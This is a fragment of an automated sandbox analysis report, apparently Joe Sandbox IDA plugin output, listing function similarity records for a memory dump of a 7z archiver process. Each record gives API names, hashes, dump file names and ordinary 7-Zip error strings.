                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$fputc
                                                                                                                                                                                                                                          • String ID: $:
                                                                                                                                                                                                                                          • API String ID: 1185151155-4041779174
                                                                                                                                                                                                                                          • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                          • Instruction ID: bbc5f51778f6a48386fa2b04a74a201d8c3e886db72bc387d8d1f21769d509ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E06D9A304A8085DB169B26E95439D6325FB9DFCDF488122EE8E0B729DE2CC248C711
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 408039514-0
                                                                                                                                                                                                                                          • Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                          • Instruction ID: 8942185ee1fdd142780c072412d3c3762143e0f934412728bef4d283742fb129
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9181BF32315A4082CB26DF26D44076E77B1F788BA4F544625EF9E4BB68EF38D891C700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                          • Instruction ID: 2f673e2d7922c718e7d09235fe85c6f44ead3637766d6dbf4b6985d50823d0c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 004119373157909ACB26DE22E5402AE6760FB8ABE4F095221EF9D0BB59DF38C495C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                                                          • String ID: Internal collision in update action set
                                                                                                                                                                                                                                          • API String ID: 265668421-2378581463
                                                                                                                                                                                                                                          • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                          • Instruction ID: 09640e716b9c054a5e5d8e0c3ad04dfa71c1adf41e7029e2b36a7a29af78b2e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 274155773086858ADB3ACB1AE454B6E7B50F38578DF048115EF8907B78DB7AD689CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00322137
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003221BB
                                                                                                                                                                                                                                            • Part of subcall function 00316618: FormatMessageW.KERNEL32 ref: 00316676
                                                                                                                                                                                                                                            • Part of subcall function 00316618: LocalFree.KERNEL32 ref: 00316698
                                                                                                                                                                                                                                            • Part of subcall function 0031362C: memmove.MSVCRT ref: 00313659
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00322182
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1743135865-3653984579
                                                                                                                                                                                                                                          • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                          • Instruction ID: ecc03983b98cc7ca821438ec9caf63c930110c9c8c7fa7af2c8db79c8281d539
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB015A6730490065CA26EB25E88129B6721EBCDBF4F545331BE5E4B779DE28CAC6C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Can not open the file as archive, xrefs: 003542D8
                                                                                                                                                                                                                                          • Can not open encrypted archive. Wrong password?, xrefs: 00354297
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs
                                                                                                                                                                                                                                          • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                                                          • API String ID: 1795875747-2399861261
                                                                                                                                                                                                                                          • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                          • Instruction ID: b46fd497526bc4f261a2c79d77cc8d0091adeb11b061ef91655cf7aabd5dce83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF01D66631065592EF1AEF26E84079E1321AB48BC6F54A032EE0B4B764CE3DC5E9C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1534225298-0
                                                                                                                                                                                                                                          • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                          • Instruction ID: d008e9f614cb24aecfb9efe378b4b51ff3f7146ab0ebd000dc02b10f981fd0bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17210863601F8099DB1BAF26ECD576A6354BB49B94F1D8124EF990F380DF78C886C312